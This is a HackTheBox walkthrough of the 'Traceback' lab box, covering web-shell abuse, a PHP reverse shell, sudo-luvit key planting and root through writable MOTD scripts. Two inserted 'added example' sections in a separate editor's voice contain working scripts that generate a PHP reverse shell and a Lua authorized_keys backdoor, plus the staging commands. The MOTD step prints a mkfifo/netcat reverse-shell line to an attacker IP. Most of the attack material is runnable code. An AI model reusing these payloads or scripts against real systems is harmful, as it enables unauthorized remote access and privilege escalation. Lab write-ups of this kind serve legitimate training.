HackTheBox Writeup — Traceback

HackTheBox is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine 'Traceback', a Linux box rated 'Easy'.

Image 1: Traceback Info Card.

1. Summary

The initial foothold on this box comes from finding a hidden web shell left behind on an already compromised web server and using it to upload our own PHP reverse shell, which gives us access as the 'Webmin' user. To escalate to Sysadmin we abuse a sudo rule that lets Webmin run a luvit (Lua runtime) binary as Sysadmin, and use a Lua script to plant our SSH key. Finally, to reach root we modify one of the 'Message of the Day' scripts in /etc/update-motd.d/, which are executed as root whenever anyone logs in via SSH.

2. Enumeration and Initial Foothold (Webmin)

Image 2: Nmap Port Scan Results.

The scan shows just two services: SSH on port 22 and a web application on port 80. I visited the web application and was presented with the page below.

Image 3: Compromised Web Application on Port 80.

After inspecting the web page it was clear there was no functionality to interact with; however, the HTML source contains the following comment:

<!--Some of the best web shells that you might need ;) -->
Image 4: HTML of Compromised Web Page.

Searching for this comment led me to a popular GitHub repository containing numerous PHP web shells. The description at the top of that repository matched the HTML comment exactly, so I assumed I was on the right track. Requesting http://10.10.10.181/smevk.php (one of the shells in that repository) presented the page below.

Image 5: Compromised Web Application, Smevk Web-Shell Login Page.

I immediately tried admin:admin, the default credentials documented in the repository, and this worked. I now had a web console that allowed me to upload PHP files, so I downloaded the PHP reverse shell script from PentestMonkey, changed its IP address and port to point at my machine, saved it as 'JDR.php' and uploaded it through the console.

Image 6: Modified PHP Reverse Shell Script (JDR.php).
Image 7: PHP-Reverse-Shell (JDR.php) Uploaded to Smevk Web Console.

Back on my Kali machine I started a netcat listener on port 9090 and, in another terminal, issued the following curl command to make an HTTP GET request for JDR.php, which makes the web server execute it:

curl http://10.10.10.181/JDR.php

This caught a reverse shell from the Traceback machine and gave me an initial foothold as the 'Webmin' user.

Image 8: Initial Foothold (Webmin) Shell.
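The foothold step above, written out as an added example (this is the editor's code, not the writeup's or PentestMonkey's script): a small shell script that generates a minimal PHP reverse shell for upload through the web console, after checking the two values that have to be changed in any such script, the attacker IP and the listener port. The address 10.10.17.13 and port 9090 are the values used in this writeup; the output file name and the validation helpers are the editor's additions. The PHP payload hands the socket to /bin/sh through proc_open, which works under mod_php and php-fpm, where the fd-3 redirection trick of the `php -r` one-liner does not reliably apply.

```shell
#!/bin/sh
# Added example (editor's code, not the writeup's or PentestMonkey's script). Generates
# a minimal PHP reverse shell for upload through the web console, after checking the
# two values that must be edited in any such script: attacker IP and listener port.
# Assumptions (editor's): output file name JDR.php; the address/port are the writeup's.

# Accept only a dotted-quad IPv4 address (four decimal octets, each 0..255).
validate_ipv4() {
  case "$1" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  IFS=.
  set -- $1
  unset IFS
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
}

# Accept only a TCP port in 1..65535.
validate_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the PHP payload. proc_open attaches the socket as stdin/stdout/stderr of
# /bin/sh, which works under mod_php and php-fpm; the `php -r` one-liner's "<&3 >&3"
# trick assumes the socket landed on file descriptor 3, which is not guaranteed there.
make_php_revshell() {
  validate_ipv4 "$1" || { echo "bad IPv4 address: $1" >&2; return 1; }
  validate_port "$2" || { echo "bad port: $2" >&2; return 1; }
  cat <<EOF
<?php
// Connect back to the listener and attach an interactive shell to the socket.
\$sock = fsockopen("$1", $2, \$errno, \$errstr, 10);
if (!\$sock) { die("connect failed: \$errstr (\$errno)"); }
\$proc = proc_open("/bin/sh -i", [0 => \$sock, 1 => \$sock, 2 => \$sock], \$pipes);
if (is_resource(\$proc)) { proc_close(\$proc); }
fclose(\$sock);
EOF
}

# Usage: ./make_shell.sh 10.10.17.13 9090 > JDR.php
#   terminal 1: nc -lvnp 9090          terminal 2: curl http://10.10.10.181/JDR.php
if [ "$#" -eq 2 ]; then
  make_php_revshell "$1" "$2"
fi
```

Run it as `./make_shell.sh 10.10.17.13 9090 > JDR.php`, upload the result through the web console, start the listener, then curl the file. If proc_open is listed in the server's PHP disable_functions, the payload fails without output; the full PentestMonkey script depends on proc_open as well.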

3. User Shell — Sysadmin

After upgrading my shell, I ran a Linux enumeration script, which returned three promising results:

  1. A strange ‘note.txt’ file within the Webmin home directory.
  2. A sudo rule lets Webmin run a luvit binary in the Sysadmin home directory as the Sysadmin user.
  3. The Sysadmin home directory also contains a hidden SSH directory.
Image 9: Contents of Note.txt and Webmin Special Permissions.

In short, luvit is a Lua runtime (LuaJIT on top of libuv), so it executes arbitrary Lua scripts, and since sudo lets us run it as Sysadmin, everything the script does, file writes included, happens as Sysadmin. We can therefore write a Lua script that appends our SSH public key to the authorized_keys file in Sysadmin's hidden .ssh directory.

Image 10: Lua Script.

I then used Python's SimpleHTTPServer module to host the Lua script temporarily and fetched it on the Traceback machine with wget.

Image 11: Downloading the Lua Script to Webmin's home directory.

With the Lua script in Webmin's home directory, I used the command below to run it as Sysadmin. luvit takes the script path as its argument; run with no argument it drops into an interactive Lua REPL, where the same statements can be typed in by hand. The script file must be readable by the sysadmin user, since that is who luvit runs as.

sudo -u sysadmin /home/sysadmin/luvit

Back on my Kali machine, I logged in as Sysadmin over SSH with the matching private key and read user.txt.

Image 12: Sysadmin Shell and User.txt.
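The Lua step, as an added example (editor's code, not the writeup's Lua script, which only appears as an image): a shell function that writes the Lua payload, followed by the staging commands in the order this writeup used them. The key file name sysadmin_key, the staging port 8000 and /tmp as the drop location on the target are the editor's assumptions; the target home /home/sysadmin and the sudo command come from the writeup.

```shell
#!/bin/sh
# Added example (editor's code, not the writeup's Lua script). Emits the Lua that
# appends an SSH public key to the target user's authorized_keys, for execution via
# the sudo-permitted luvit binary. luvit is LuaJIT on libuv, so the standard io and os
# libraries used below are available to the script.
# Assumptions (editor's): key file name sysadmin_key, staging port 8000, /tmp as the
# drop location. The sudo command and /home/sysadmin come from the writeup.

# Print a Lua script that appends PUBKEY to TARGET_HOME/.ssh/authorized_keys.
# The key goes into a Lua long string ([[...]]) so no escaping is needed for the
# base64 body or the comment field of an OpenSSH public key.
make_lua_payload() {
  pubkey="$1"
  target_home="$2"
  cat <<EOF
-- Runs as the sudo target user (sysadmin), so every write below lands as that user.
local dir = "${target_home}/.ssh"
local path = dir .. "/authorized_keys"
-- Create the directory if missing and keep sshd's permission requirements satisfied.
os.execute("mkdir -p '" .. dir .. "' && chmod 700 '" .. dir .. "'")
local key = [[${pubkey}]]
local f = assert(io.open(path, "a"))
f:write(key, "\n")
f:close()
os.execute("chmod 600 '" .. path .. "'")
print("appended key to " .. path)
EOF
}

# The full chain in the writeup's order (not executed here):
#   ssh-keygen -t rsa -b 4096 -f ./sysadmin_key -N ''                   # attacker box
#   ./make_payload.sh "$(cat sysadmin_key.pub)" /home/sysadmin > privesc.lua
#   python3 -m http.server 8000   # attacker box (python -m SimpleHTTPServer 8000 on Python 2)
#   wget http://10.10.17.13:8000/privesc.lua -O /tmp/privesc.lua          # target, as Webmin
#   chmod 644 /tmp/privesc.lua          # luvit runs as sysadmin, who must be able to read it
#   sudo -u sysadmin /home/sysadmin/luvit /tmp/privesc.lua                # target
#   ssh -i sysadmin_key sysadmin@10.10.10.181                              # attacker box
if [ "$#" -eq 2 ]; then
  make_lua_payload "$1" "$2"
fi
```

Appending rather than overwriting keeps any key already in authorized_keys intact, and the chmod calls matter: sshd refuses a .ssh directory or authorized_keys file that is writable by others, so a sloppy write would leave the key in place but unusable.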

4. Root

Continuing the privilege escalation, I watched the processes on the Traceback machine with pspy64, which shows other users' processes without needing root. There was a process running as root that copies the 'Message of the Day' (motd) scripts from a backup directory into /etc/update-motd.d/ every 30 seconds, resetting them to a known state.

Image 13: Interesting Process from Pspy64.

Navigating into this directory we can see that the Sysadmin user has write permission on these files, and the contents of the 00-header file are exactly what was printed to the terminal when I logged in via SSH (see image 12): these scripts generate the login banner.

Image 14: Write Permissions on MOTD files and

These scripts are run by pam_motd as root at every SSH login, regardless of which user logs in. So if we append a reverse shell command to 00-header and then log in as Sysadmin via SSH, the command runs as root and we get a root shell. The catch is the process from the previous step: our edit is overwritten within 30 seconds, so the login has to follow the edit almost immediately. The reverse shell command that worked for me is the one below, appended to the end of the '00-header' file.

rm /tmp/f1; mkfifo /tmp/f1; cat /tmp/f1 | /bin/sh -i 2>&1 | nc 10.10.17.13 8888 > /tmp/f1
Image 15: Reverse-Shell Command within 00-header File.

With a netcat listener on port 8888 on our Kali machine, logging in as sysadmin via SSH straight after the edit drops a root shell into the listener, where we can read the root flag. The SSH session itself appears to hang for as long as the root shell is connected, because pam_motd waits for 00-header to finish running.

Image 16: Root Shell and root.txt.

5. Conclusion

This was my fifth owned machine on HackTheBox and definitely one of my favourites, although I wasn't too keen on the initial stage as it felt like guesswork rather than working something out. Nevertheless, I learnt something new at every step of the way, including a little bit about Lua and the importance of checking running processes.

Keep an eye out for my future write-ups!

Jack Roberts
MSc Cyber Security Student at Lancaster University. Mostly posting CTF writeups from HackTheBox, TryHackMe and VulnHub.